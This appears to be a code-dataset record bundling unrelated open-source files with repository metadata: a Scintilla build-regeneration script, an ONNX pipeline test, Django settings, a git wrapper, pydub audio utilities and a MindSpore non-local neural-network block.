ReplaceREInFile(root + "LongTermDownload.html",
r"(/sourceforge.net/projects/scintilla/files/scintilla/)[\d\.]+(/[a-zA-Z]+)\d+",
r"\g<1>" + sci.versionDotted + "\g<2>" + sci.version)
# Last 24 digits of UUID, used for item IDs in Xcode
def uid24():
return str(uuid.uuid4()).replace("-", "").upper()[-24:]
def ciLexerKey(a):
return a.split()[2].lower()
"""
11F35FDB12AEFAF100F0236D /* LexA68k.cxx in Sources */ = {isa = PBXBuildFile; fileRef = 11F35FDA12AEFAF100F0236D /* LexA68k.cxx */; };
11F35FDA12AEFAF100F0236D /* LexA68k.cxx */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; name = LexA68k.cxx; path = ../../lexers/LexA68k.cxx; sourceTree = SOURCE_ROOT; };
11F35FDA12AEFAF100F0236D /* LexA68k.cxx */,
11F35FDB12AEFAF100F0236D /* LexA68k.cxx in Sources */,
"""
def RegenerateXcodeProject(path, lexers, lexerReferences):
# Build 4 blocks for insertion:
    # Each marker contains a unique section start, an optional wait string, and a section end
markersPBXBuildFile = ["Begin PBXBuildFile section", "", "End PBXBuildFile section"]
sectionPBXBuildFile = []
markersPBXFileReference = ["Begin PBXFileReference section", "", "End PBXFileReference section"]
sectionPBXFileReference = []
markersLexers = ["/* Lexers */ =", "children", ");"]
sectionLexers = []
markersPBXSourcesBuildPhase = ["Begin PBXSourcesBuildPhase section", "files", ");"]
sectionPBXSourcesBuildPhase = []
for lexer in lexers:
if lexer not in lexerReferences:
uid1 = uid24()
uid2 = uid24()
print("Lexer", lexer, "is not in Xcode project. Use IDs", uid1, uid2)
lexerReferences[lexer] = [uid1, uid2]
linePBXBuildFile = "\t\t{} /* {}.cxx in Sources */ = {{isa = PBXBuildFile; fileRef = {} /* {}.cxx */; }};".format(uid1, lexer, uid2, lexer)
linePBXFileReference = "\t\t{} /* {}.cxx */ = {{isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; name = {}.cxx; path = ../../lexers/{}.cxx; sourceTree = SOURCE_ROOT; }};".format(uid2, lexer, lexer, lexer)
lineLexers = "\t\t\t\t{} /* {}.cxx */,".format(uid2, lexer)
linePBXSourcesBuildPhase = "\t\t\t\t{} /* {}.cxx in Sources */,".format(uid1, lexer)
sectionPBXBuildFile.append(linePBXBuildFile)
sectionPBXFileReference.append(linePBXFileReference)
sectionLexers.append(lineLexers)
sectionPBXSourcesBuildPhase.append(linePBXSourcesBuildPhase)
lines = ReadFileAsList(path)
sli = FindSectionInList(lines, markersPBXBuildFile)
lines[sli.stop:sli.stop] = sectionPBXBuildFile
sli = FindSectionInList(lines, markersPBXFileReference)
lines[sli.stop:sli.stop] = sectionPBXFileReference
sli = FindSectionInList(lines, markersLexers)
# This section is shown in the project outline so sort it to make it easier to navigate.
allLexers = sorted(lines[sli.start:sli.stop] + sectionLexers, key=ciLexerKey)
lines[sli] = allLexers
sli = FindSectionInList(lines, markersPBXSourcesBuildPhase)
lines[sli.stop:sli.stop] = sectionPBXSourcesBuildPhase
UpdateFileFromLines(path, lines, "\n")
def RegenerateAll(root):
scintillaBase = os.path.abspath(root)
sci = ScintillaData.ScintillaData(root)
Regenerate(root + "src/Catalogue.cxx", "//", sci.lexerModules)
Regenerate(root + "win32/scintilla.mak", "#", sci.lexFiles)
startDir = os.getcwd()
os.chdir(os.path.join(scintillaBase, "win32"))
win32.DepGen.Generate()
os.chdir(os.path.join(scintillaBase, "gtk"))
gtk.DepGen.Generate()
os.chdir(startDir)
RegenerateXcodeProject(root + "cocoa/ScintillaFramework/ScintillaFramework.xcodeproj/project.pbxproj",
sci.lexFiles, sci.lexersXcode)
UpdateVersionNumbers(sci, root)
HFacer.RegenerateAll(root, False)
if __name__=="__main__":
RegenerateAll("../")
| 44.541935
| 249
| 0.671495
|
794ffd81bf08d9b067f88d06e2115a9372f9cba9
| 3,611
|
py
|
Python
|
src/test_onnx.py
|
kkourt/cmnnc
|
965e8150ab50c19237dbf4afd2e62bca1f5d53c8
|
[
"BSD-3-Clause"
] | 8
|
2020-04-08T04:27:22.000Z
|
2022-01-02T08:21:07.000Z
|
src/test_onnx.py
|
kkourt/cmnnc
|
965e8150ab50c19237dbf4afd2e62bca1f5d53c8
|
[
"BSD-3-Clause"
] | null | null | null |
src/test_onnx.py
|
kkourt/cmnnc
|
965e8150ab50c19237dbf4afd2e62bca1f5d53c8
|
[
"BSD-3-Clause"
] | 5
|
2020-02-05T11:59:38.000Z
|
2021-12-07T07:14:14.000Z
|
# Copyright (c) 2019-2020, IBM Research.
#
# Author: Kornilios Kourtis <kou@zurich.ibm.com>
#
# vim: set expandtab softtabstop=4 tabstop=4 shiftwidth=4:
import typing
import dataclasses as dc
from pprint import pprint
import numpy as np
import onnxruntime as onnxrt
import onnx
import conv
import pipeline as pl
from onnx_test_models import mk_simple_residual as onnx_mk_simple_residual
from onnx_util import onnx_rand_input
from onnx_graph import OnnxGraph
def test_onnx_residual_2d():
# Create the following ONNX graph
# (this is what onnx_mk_simple_residual does)
#
# CONV2D ---> CONV2D ---> ADD
# | ^
# | |
# +--------------- +
#
# CONV2D
# input: in
# output: v1
# weights: w1
# CONV2D
# input: v1
# output: v2
# weights: w2
# ADD
# input: v1,v2
# output: out
conv1_padding = 1
conv2_padding = 1
conv1_ps = conv.Conv2DParams(
i=conv.Conv2DInParams(w=32, h=32, d=3),
f=conv.Conv2DFiltParams(w=3, h=3, d=3, l=1),
p=conv1_padding,
p_out=conv2_padding,
s=1,
)
conv2_ps = conv.Conv2DParams(
i=conv1_ps.o.to_in(),
f=conv.Conv2DFiltParams(w=3, h=3, d=conv1_ps.f.l, l=1),
p=conv2_padding,
p_out=0,
s=1,
)
# create simple model with residual path
onnx_m = onnx_mk_simple_residual(conv1_ps, conv2_ps)
# create random input
inp = onnx_rand_input(onnx_m)
# Execute using onnxruntime
onnx.save(onnx_m, "simple_residual_2d.onnx")
sess = onnxrt.InferenceSession("simple_residual_2d.onnx")
out = sess.run(None, inp)
# Parse onnx graph, and create a pipeline
graph = OnnxGraph(onnx_m)
pprint(graph.partitions)
pline = graph.get_pipeline()
# set inputs
for (inp_name, inp_data) in inp.items():
obj_info = graph.objs_info[inp_name]
assert inp_data.shape == (1,) + obj_info.shape # NB: batching
# data = np.random.rand(*obj_info.shape)
data = inp_data[0]
data = np.pad(data, obj_info.padding)
obj = pline.get_object(inp_name)
obj[...] = data
# Execute the pipeline
print_info = False
for iters in pline.tick_gen():
if print_info:
print("*" * 80)
for (s, i) in iters.items():
if print_info:
print("%s: %s" % (s, i))
if print_info:
print("*" * 80)
print("%s> DONE" % ("-" * 30,))
# Get pipeline results
pline_out = pline.get_object("out")
pline_v1 = pline.get_object("v1")
pline_v2 = pline.get_object("v2")
# Execute using manual ops
in_m = np.pad(inp["in"][0], graph.objs_info["in"].padding)
w1_m = np.array(graph.init_tvs["w1"].float_data).reshape(
conv1_ps.get_filters_shape()
)
v1_m = conv.conv2d_simple(in_m, w1_m, conv1_ps)
v1_m = np.pad(v1_m, graph.objs_info["v1"].padding)
np.testing.assert_allclose(
v1_m, pline_v1, err_msg="pipeline v1 does not match manual v1"
)
w2_m = np.array(graph.init_tvs["w2"].float_data).reshape(
conv2_ps.get_filters_shape()
)
v2_m = conv.conv2d_simple(v1_m, w2_m, conv2_ps)
v2_m = np.pad(v2_m, graph.objs_info["v2"].padding)
np.testing.assert_allclose(
v2_m, pline_v2, err_msg="pipeline v2 does not match manual v2"
)
np.testing.assert_allclose(
out[0][0, :], pline_out, err_msg="OUT does not match", rtol=1e-06
)
return graph
if __name__ == "__main__":
ret = test_onnx_residual_2d()
| 27.150376
| 74
| 0.609526
|
794ffe7c25991b4b9d159eff214d7f8c84fbc886
| 72
|
py
|
Python
|
modbus_tcp_server/data_source/__init__.py
|
smok-serwis/modbus-tcp-server
|
558eca908b6762280a74b16d78d56dc047a9dace
|
[
"MIT"
] | null | null | null |
modbus_tcp_server/data_source/__init__.py
|
smok-serwis/modbus-tcp-server
|
558eca908b6762280a74b16d78d56dc047a9dace
|
[
"MIT"
] | null | null | null |
modbus_tcp_server/data_source/__init__.py
|
smok-serwis/modbus-tcp-server
|
558eca908b6762280a74b16d78d56dc047a9dace
|
[
"MIT"
] | null | null | null |
from .base import BaseDataSource
from .testing import TestingDataSource
| 24
| 38
| 0.861111
|
794ffedfb7b99f73279d7608665beabb55738339
| 5,386
|
py
|
Python
|
templates/ecs.py
|
skyer9/CloudFormationForPython
|
6b5e1de4336a0ba9b0899a3cd7c83e08d24b078e
|
[
"MIT"
] | 1
|
2019-02-18T06:45:36.000Z
|
2019-02-18T06:45:36.000Z
|
templates/ecs.py
|
skyer9/CloudFormationForPython
|
6b5e1de4336a0ba9b0899a3cd7c83e08d24b078e
|
[
"MIT"
] | null | null | null |
templates/ecs.py
|
skyer9/CloudFormationForPython
|
6b5e1de4336a0ba9b0899a3cd7c83e08d24b078e
|
[
"MIT"
] | 1
|
2019-02-18T06:45:41.000Z
|
2019-02-18T06:45:41.000Z
|
from troposphere import (
AWS_ACCOUNT_ID,
AWS_REGION,
Equals,
GetAtt,
iam,
Join,
logs,
Not,
Output,
Ref,
Template,
ImportValue, Sub)
from troposphere.ecs import (
ContainerDefinition,
DeploymentConfiguration,
Environment,
LoadBalancer,
LogConfiguration,
PortMapping,
Service,
TaskDefinition,
)
from configuration import (
stack_base_name,
application_revision,
secret_key,
web_worker_cpu,
web_worker_memory,
web_worker_desired_count,
deploy_condition,
web_worker_port,
api_domain_name,
)
repository = ImportValue(Sub(stack_base_name + '-ecr-Repository'))
assets_bucket = ImportValue(Sub(stack_base_name + '-assets-AssetsBucket'))
distribution = ImportValue(Sub(stack_base_name + '-assets-Distribution'))
db_instance = ImportValue(Sub(stack_base_name + '-rds-MySQLInstance'))
jdbc_connection_string = ImportValue(Sub(stack_base_name + '-rds-JDBCConnectionString'))
cluster = ImportValue(Sub(stack_base_name + '-cluster-Cluster'))
application_target_group = ImportValue(Sub(stack_base_name + '-cluster-ApplicationTargetGroup'))
template = Template()
template.add_condition(deploy_condition, Not(Equals(application_revision, "")))
image = Join("", [
Ref(AWS_ACCOUNT_ID),
".dkr.ecr.",
Ref(AWS_REGION),
".amazonaws.com/",
repository,
":",
application_revision,
])
web_log_group = logs.LogGroup(
"WebLogs",
template=template,
RetentionInDays=365,
DeletionPolicy="Retain",
)
log_configuration = LogConfiguration(
LogDriver="awslogs",
Options={
'awslogs-group': Ref(web_log_group),
'awslogs-region': Ref(AWS_REGION),
}
)
# ECS task
web_task_definition = TaskDefinition(
"WebTask",
template=template,
Condition=deploy_condition,
ContainerDefinitions=[
ContainerDefinition(
Name="WebWorker",
# 1024 is full CPU
Cpu=web_worker_cpu,
Memory=web_worker_memory,
Essential=True,
Image=Join("", [
Ref(AWS_ACCOUNT_ID),
".dkr.ecr.",
Ref(AWS_REGION),
".amazonaws.com/",
repository,
":",
application_revision,
]),
PortMappings=[PortMapping(
HostPort=0,
ContainerPort=web_worker_port,
)],
LogConfiguration=LogConfiguration(
LogDriver="awslogs",
Options={
'awslogs-group': Ref(web_log_group),
'awslogs-region': Ref(AWS_REGION),
}
),
Environment=[
Environment(
Name="AWS_STORAGE_BUCKET_NAME",
Value=assets_bucket,
),
Environment(
Name="CDN_DOMAIN_NAME",
Value=distribution,
),
Environment(
Name="DOMAIN_NAME",
Value=api_domain_name,
),
Environment(
Name="PORT",
Value=web_worker_port,
),
Environment(
Name="SECRET_KEY",
Value=secret_key,
),
Environment(
Name="DATABASE_URL",
Value=jdbc_connection_string,
),
],
)
],
)
application_service_role = iam.Role(
"ApplicationServiceRole",
template=template,
AssumeRolePolicyDocument=dict(Statement=[dict(
Effect="Allow",
Principal=dict(Service=["ecs.amazonaws.com"]),
Action=["sts:AssumeRole"],
)]),
Path="/",
Policies=[
iam.Policy(
PolicyName="WebServicePolicy",
PolicyDocument=dict(
Statement=[dict(
Effect="Allow",
Action=[
"elasticloadbalancing:Describe*",
"elasticloadbalancing:RegisterTargets",
"elasticloadbalancing:DeregisterTargets",
"elasticloadbalancing"
":DeregisterInstancesFromLoadBalancer",
"elasticloadbalancing"
":RegisterInstancesWithLoadBalancer",
"ec2:Describe*",
"ec2:AuthorizeSecurityGroupIngress",
],
Resource="*",
)],
),
),
]
)
application_service = Service(
"ApplicationService",
template=template,
Cluster=cluster,
Condition=deploy_condition,
DeploymentConfiguration=DeploymentConfiguration(
MaximumPercent=135,
MinimumHealthyPercent=30,
),
DesiredCount=web_worker_desired_count,
LoadBalancers=[LoadBalancer(
ContainerName="WebWorker",
ContainerPort=web_worker_port,
TargetGroupArn=application_target_group,
)],
TaskDefinition=Ref(web_task_definition),
Role=Ref(application_service_role),
)
template.add_output(Output(
"WebLogsGroup",
Description="Web application log group",
Value=GetAtt(web_log_group, "Arn")
))
def get():
return template.to_yaml()
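# Illustrative usage sketch (hedged): rendering the template to YAML only needs
# the `configuration` module and its exported stacks to be importable; the
# output file name below is a placeholder.
if __name__ == "__main__":
    with open("ecs-template.yaml", "w") as fh:
        fh.write(get())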
| 27.20202
| 96
| 0.559599
|
794fff4b71d33e1c96ffa24f861e9070e1f0c40a
| 3,714
|
py
|
Python
|
changes/vcs/git.py
|
alex/changes
|
69a17b4c639e7082a75d037384ccb68ead3a0b4b
|
[
"Apache-2.0"
] | 1
|
2015-11-08T13:00:44.000Z
|
2015-11-08T13:00:44.000Z
|
changes/vcs/git.py
|
alex/changes
|
69a17b4c639e7082a75d037384ccb68ead3a0b4b
|
[
"Apache-2.0"
] | null | null | null |
changes/vcs/git.py
|
alex/changes
|
69a17b4c639e7082a75d037384ccb68ead3a0b4b
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import, division, print_function
from datetime import datetime
from urlparse import urlparse
from changes.utils.cache import memoize
from .base import Vcs, RevisionResult, BufferParser, CommandError
LOG_FORMAT = '%H\x01%an <%ae>\x01%at\x01%cn <%ce>\x01%ct\x01%P\x01%B\x02'
ORIGIN_PREFIX = 'remotes/origin/'
class LazyGitRevisionResult(RevisionResult):
def __init__(self, vcs, *args, **kwargs):
self.vcs = vcs
super(LazyGitRevisionResult, self).__init__(*args, **kwargs)
@memoize
def branches(self):
return self.vcs.branches_for_commit(self.id)
class GitVcs(Vcs):
binary_path = 'git'
def get_default_env(self):
return {
'GIT_SSH': self.ssh_connect_path,
}
def get_default_revision(self):
return 'master'
@property
def remote_url(self):
if self.url.startswith(('ssh:', 'http:', 'https:')):
parsed = urlparse(self.url)
url = '%s://%s@%s/%s' % (
parsed.scheme,
parsed.username or self.username or 'git',
parsed.hostname + (':%s' % (parsed.port,) if parsed.port else ''),
parsed.path.lstrip('/'),
)
else:
url = self.url
return url
def branches_for_commit(self, id):
results = []
output = self.run(['branch', '-a', '--contains', id])
for result in output.splitlines():
# HACK(dcramer): is there a better way around removing the prefix?
result = result[2:].strip()
if result.startswith(ORIGIN_PREFIX):
result = result[len(ORIGIN_PREFIX):]
if result == 'HEAD':
continue
results.append(result)
return list(set(results))
def run(self, cmd, **kwargs):
cmd = [self.binary_path] + cmd
return super(GitVcs, self).run(cmd, **kwargs)
def clone(self):
self.run(['clone', '--mirror', self.remote_url, self.path])
def update(self):
self.run(['fetch', '--all'])
def log(self, parent=None, offset=0, limit=100):
# TODO(dcramer): we should make this streaming
cmd = ['log', '--all', '--pretty=format:%s' % (LOG_FORMAT,)]
if parent:
cmd.append(parent)
if offset:
cmd.append('--skip=%d' % (offset,))
if limit:
cmd.append('--max-count=%d' % (limit,))
result = self.run(cmd)
for chunk in BufferParser(result, '\x02'):
(sha, author, author_date, committer, committer_date,
parents, message) = chunk.split('\x01')
            # sha may begin with a newline left over from the previous record's separator (git log adds one after each entry)
sha = sha.lstrip('\n')
parents = filter(bool, parents.split(' '))
author_date = datetime.utcfromtimestamp(float(author_date))
committer_date = datetime.utcfromtimestamp(float(committer_date))
yield LazyGitRevisionResult(
vcs=self,
id=sha,
author=author,
committer=committer,
author_date=author_date,
committer_date=committer_date,
parents=parents,
message=message,
)
def export(self, id):
cmd = ['log', '-n 1', '-p', '--pretty="%b"', id]
result = self.run(cmd)[4:]
return result
def is_child_parent(self, child_in_question, parent_in_question):
cmd = ['merge-base', '--is-ancestor', parent_in_question, child_in_question]
try:
self.run(cmd)
return True
except CommandError:
return False
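# Illustrative usage sketch (hedged): the constructor arguments live in the base
# Vcs class (.base), which is not shown here, so the keyword names below are
# assumptions; the URL and path are placeholders.
#
#     vcs = GitVcs(url='https://example.com/repo.git', path='/tmp/repo.git')
#     vcs.clone()
#     for revision in vcs.log(limit=10):
#         print(revision.id, revision.author, revision.branches)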
| 31.210084
| 84
| 0.562466
|
794fff5d828446d85cceda6a506d45b8c0eec90c
| 1,920
|
py
|
Python
|
utils.py
|
Team-Audio/audio_overlay_tool
|
92e7a1b222cf16227448f03230d9aca61ae44182
|
[
"MIT"
] | null | null | null |
utils.py
|
Team-Audio/audio_overlay_tool
|
92e7a1b222cf16227448f03230d9aca61ae44182
|
[
"MIT"
] | null | null | null |
utils.py
|
Team-Audio/audio_overlay_tool
|
92e7a1b222cf16227448f03230d9aca61ae44182
|
[
"MIT"
] | null | null | null |
import asyncio
import os
from typing import AnyStr, Dict
from pydub import AudioSegment
from pathlib import Path
def is_file_in_dir(file: AnyStr, directory: AnyStr) -> bool:
"""
same as os.path.isfile but with a cwd
:param file: the file you want to check
:param directory: the directory that the file lives in
:return: True if the file exists
"""
return os.path.isfile(os.path.join(directory, file))
def merge_audio(a, *rest, out) -> None:
"""
Merges two or more audio files
:param a: the path to the base file
:param rest: the paths to the other files you want to overlay
:param out: the path to save the new file under
"""
# open samples
start = AudioSegment.from_file(a)
others = [AudioSegment.from_file(x) for x in rest]
# keep overlaying
for other in others:
start = start.overlay(other)
# export final audio
start.export(out, format='wav')
def ensure_folder(path: AnyStr) -> None:
"""
Makes sure that a folder and all its parents exist
"""
Path(path).mkdir(parents=True, exist_ok=True)
def num_to_char_lut(num: int) -> str:
"""
Translates a number to the corresponding character in the alphabet
0->a
1->b
2->c etc..
"""
lut = "abcdefghijklmnopqrstuvwxyz"
return lut[num]
def build_pattern(match_dict: Dict[str, str], pattern: str) -> str:
"""
Collapses a dictionary into a string based on the keys
For example:
match_dict = { 'a' : 'c' }
pattern = 'abc'
result = 'cbc'
:return:
"""
p = pattern
for key, value in match_dict.items():
p = p.replace(key, value)
return p
def background(f):
def wrapped(*args, **kwargs):
return asyncio.get_event_loop().run_in_executor(None, f, *args, **kwargs)
return wrapped
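# Illustrative usage sketch (hedged): the file paths below are placeholders and
# merge_audio needs real audio files (plus ffmpeg via pydub) to run, so that
# call is left commented out; the pure helpers can be exercised directly.
#
#     merge_audio("base.wav", "overlay1.wav", "overlay2.wav", out="mixed.wav")
if __name__ == "__main__":
    assert num_to_char_lut(2) == "c"
    assert build_pattern({"a": "c"}, "abc") == "cbc"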
| 23.414634
| 82
| 0.616667
|
794fff6c8e2fabdda895cec4c280526cfa2d2856
| 3,514
|
py
|
Python
|
authapp/authapp/settings.py
|
janakhpon/django-auth
|
4e19f68b7b9a19a7fc2c0649f0938e0926cced0a
|
[
"MIT"
] | null | null | null |
authapp/authapp/settings.py
|
janakhpon/django-auth
|
4e19f68b7b9a19a7fc2c0649f0938e0926cced0a
|
[
"MIT"
] | null | null | null |
authapp/authapp/settings.py
|
janakhpon/django-auth
|
4e19f68b7b9a19a7fc2c0649f0938e0926cced0a
|
[
"MIT"
] | null | null | null |
"""
Django settings for authapp project.
Generated by 'django-admin startproject' using Django 2.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'j$cr3nnzcerjx2yd_twznu$h2n)q9^_t-#3kthbtpsv7_(_gw&'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'authapp.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'authapp.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.Argon2PasswordHasher',
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
]
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
        'OPTIONS': {'min_length': 9}
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
# MEDIA
MEDIA_URL = '/media/'
STATIC_URL = '/static/'
LOGIN_URL = '/app/user_login'
| 25.649635
| 91
| 0.701195
|
794fffb730b0175f439472d21994d23d050afe57
| 6,121
|
py
|
Python
|
research/cv/tsm/src/utils/non_local.py
|
mindspore-ai/models
|
9127b128e2961fd698977e918861dadfad00a44c
|
[
"Apache-2.0"
] | 77
|
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/tsm/src/utils/non_local.py
|
mindspore-ai/models
|
9127b128e2961fd698977e918861dadfad00a44c
|
[
"Apache-2.0"
] | 3
|
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/tsm/src/utils/non_local.py
|
mindspore-ai/models
|
9127b128e2961fd698977e918861dadfad00a44c
|
[
"Apache-2.0"
] | 24
|
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""non_local"""
import mindspore.nn as nn
import mindspore.ops as ops
from src.model.resnet import ResNet
class _NonLocalBlockND(nn.Cell):
"""NonLocalBlockND"""
def __init__(self, in_channels, inter_channels=None, dimension=3, sub_sample=True, bn_layer=True):
super(_NonLocalBlockND, self).__init__()
assert dimension in [1, 2, 3]
self.dimension = dimension
self.sub_sample = sub_sample
self.in_channels = in_channels
self.inter_channels = inter_channels
if self.inter_channels is None:
self.inter_channels = in_channels // 2
if self.inter_channels == 0:
self.inter_channels = 1
if dimension == 3:
conv_nd = nn.Conv3d
max_pool_layer = nn.layer.MaxPool2d(kernel_size=(1, 2, 2))
bn = nn.BatchNorm3d
elif dimension == 2:
conv_nd = nn.Conv2d
max_pool_layer = nn.MaxPool2d(kernel_size=(2, 2))
bn = nn.BatchNorm2d
else:
conv_nd = nn.Conv1d
max_pool_layer = nn.MaxPool1d(kernel_size=2)
bn = nn.BatchNorm1d
self.g = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,
kernel_size=1, stride=1, padding=0)
if bn_layer:
self.W = nn.SequentialCell(
[conv_nd(in_channels=self.inter_channels, out_channels=self.in_channels,
kernel_size=1, stride=1, padding=0, weight_init="zeros", bias_init="zeros"),
bn(self.in_channels)]
)
else:
self.W = conv_nd(in_channels=self.inter_channels, out_channels=self.in_channels,
kernel_size=1, stride=1, padding=0, weight_init="zeros", bias_init="zeros")
self.theta = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,
kernel_size=1, stride=1, padding=0)
self.phi = conv_nd(in_channels=self.in_channels, out_channels=self.inter_channels,
kernel_size=1, stride=1, padding=0)
if sub_sample:
self.g = nn.SequentialCell([self.g, max_pool_layer])
self.phi = nn.SequentialCell([self.phi, max_pool_layer])
def construct(self, x):
"""
:param x: (b, c, t, h, w)
:return:
"""
        batch_size = x.shape[0]
        transpose = ops.Transpose()
        g_x = self.g(x).view(batch_size, self.inter_channels, -1)
        g_x = transpose(g_x, (0, 2, 1))
        theta_x = self.theta(x).view(batch_size, self.inter_channels, -1)
        theta_x = transpose(theta_x, (0, 2, 1))
        phi_x = self.phi(x).view(batch_size, self.inter_channels, -1)
        f = ops.matmul(theta_x, phi_x)
        # ops.Softmax is configured with an axis and then applied to the tensor
        f_div_C = ops.Softmax(axis=-1)(f)
        y = ops.matmul(f_div_C, g_x)
        y = transpose(y, (0, 2, 1))
        y = y.view(batch_size, self.inter_channels, *x.shape[2:])
W_y = self.W(y)
z = W_y + x
return z
class NONLocalBlock1D(_NonLocalBlockND):
def __init__(self, in_channels, inter_channels=None, sub_sample=True, bn_layer=True):
super(NONLocalBlock1D, self).__init__(in_channels,
inter_channels=inter_channels,
dimension=1, sub_sample=sub_sample,
bn_layer=bn_layer)
class NONLocalBlock2D(_NonLocalBlockND):
def __init__(self, in_channels, inter_channels=None, sub_sample=True, bn_layer=True):
super(NONLocalBlock2D, self).__init__(in_channels,
inter_channels=inter_channels,
dimension=2, sub_sample=sub_sample,
bn_layer=bn_layer)
class NONLocalBlock3D(_NonLocalBlockND):
def __init__(self, in_channels, inter_channels=None, sub_sample=True, bn_layer=True):
super(NONLocalBlock3D, self).__init__(in_channels,
inter_channels=inter_channels,
dimension=3, sub_sample=sub_sample,
bn_layer=bn_layer)
class NL3DWrapper(nn.Cell):
"""NL3DWrapper"""
def __init__(self, block, n_segment):
super(NL3DWrapper, self).__init__()
self.block = block
self.nl = NONLocalBlock3D(block.bn3.num_features)
self.n_segment = n_segment
    def construct(self, x):
        x = self.block(x)
        nt, c, h, w = x.shape
        # reshape to (n, t, c, h, w) and swap the time/channel axes -> (n, c, t, h, w)
        x = x.view(nt // self.n_segment, self.n_segment, c, h, w).transpose(0, 2, 1, 3, 4)
        x = self.nl(x)
        x = x.transpose(0, 2, 1, 3, 4).view(nt, c, h, w)
        return x
def make_non_local(net, n_segment):
"""make_non_local"""
if isinstance(net, ResNet):
net.layer2 = nn.SequentialCell(
[NL3DWrapper(net.layer2[0], n_segment),
net.layer2[1],
NL3DWrapper(net.layer2[2], n_segment),
net.layer2[3]]
)
net.layer3 = nn.SequentialCell(
[NL3DWrapper(net.layer3[0], n_segment),
net.layer3[1],
NL3DWrapper(net.layer3[2], n_segment),
net.layer3[3],
NL3DWrapper(net.layer3[4], n_segment),
net.layer3[5]]
)
else:
raise NotImplementedError
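# A minimal usage sketch, assuming `net` is a ResNet instance from
# src.model.resnet with the layer2/layer3 layout expected above
# (construction arguments are omitted and depend on the model config):
#
#     net = ResNet(...)
#     make_non_local(net, n_segment=8)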
| 38.25625
| 104
| 0.576867
|
79500021c2970181de70389666a3ee05a3cf07ca
| 299
|
py
|
Python
|
3. Data types and operators/complex_numbers.py
|
CalilQ/ComDig
|
13c34eaddc909c70a00820e3a15e1308139cb134
|
[
"MIT"
] | null | null | null |
3. Data types and operators/complex_numbers.py
|
CalilQ/ComDig
|
13c34eaddc909c70a00820e3a15e1308139cb134
|
[
"MIT"
] | null | null | null |
3. Data types and operators/complex_numbers.py
|
CalilQ/ComDig
|
13c34eaddc909c70a00820e3a15e1308139cb134
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 19 16:45:07 2017
@author: Calil
"""
# Functions for complex numbers
from cmath import sqrt
# Declare variables
a = 4
b = -4
c = 1 + 2j
d = 3 - 3j
# Print to screen
print(sqrt(a))
print(sqrt(b))
print(c + d)
print(a*c)
print(d.real)
print(d.imag)
| 13
| 35
| 0.638796
|
795000af495cf9094a09aa0c7df2156df11f8319
| 6,088
|
py
|
Python
|
mycroft/metrics/__init__.py
|
assistent-cat/mycroft-core
|
6f8bae6ba136c9dd66ca47aaadd75e214d006190
|
[
"Apache-2.0"
] | 2
|
2021-04-05T22:28:37.000Z
|
2021-06-16T00:24:41.000Z
|
mycroft/metrics/__init__.py
|
assistent-cat/mycroft-core
|
